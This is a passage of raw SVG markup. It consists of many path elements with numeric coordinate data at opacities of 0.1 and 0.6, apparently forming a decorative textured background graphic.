d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n opacity=\"0.1\"></path>\n <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path 